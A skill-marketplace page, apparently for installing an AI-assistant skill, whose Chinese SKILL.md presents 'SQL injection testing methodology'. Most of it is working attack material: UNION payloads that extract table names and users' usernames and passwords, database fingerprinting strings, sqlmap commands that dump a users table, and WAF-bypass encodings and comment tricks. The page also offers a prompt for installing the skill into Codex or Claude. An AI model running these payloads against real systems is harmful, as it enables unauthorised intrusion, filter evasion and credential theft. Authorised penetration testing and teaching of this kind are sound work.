Manus에서 모든 스킬 실행
원클릭으로
원클릭으로
원클릭으로 Manus에서 모든 스킬 실행
시작하기sql-injection-testing
스타2
포크0
업데이트2026년 4월 20일 17:10
SQL注入测试的专业技能和方法论
설치
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SKILL.md
readonly메뉴
SQL注入测试的专业技能和方法论
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
API安全测试的专业技能和方法论
业务逻辑漏洞测试的专业技能和方法论
云安全审计的专业技能和方法论
命令注入漏洞测试的专业技能和方法论
容器安全测试的专业技能和方法论
CSRF跨站请求伪造测试的专业技能和方法论
| name | sql-injection-testing |
| description | SQL注入测试的专业技能和方法论 |
| version | 1.0.0 |
SQL注入是一种常见且危险的Web应用漏洞。本技能提供了系统化的SQL注入测试方法、检测技术和利用策略。
' - 查看是否出现SQL错误' AND '1'='1 vs ' AND '1'='2' AND SLEEP(5)--' UNION SELECT NULL--' AND @@version LIKE '%mysql%'--' AND version() LIKE '%PostgreSQL%'--' AND @@version LIKE '%Microsoft%'--' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--' UNION SELECT database()--' UNION SELECT table_name FROM information_schema.tables--' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--' UNION SELECT username,password FROM users--# 基础扫描
sqlmap -u "http://target.com/page?id=1"
# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST
# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs
# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
/**/, --, #SeLeCt, UnIoN/**/, +, %09(Tab), %0A(换行)原始:' UNION SELECT NULL--
绕过1:'/**/UNION/**/SELECT/**/NULL--
绕过2:'%55nion%20select%20null--
绕过3:'/*!UNION*//*!SELECT*/null--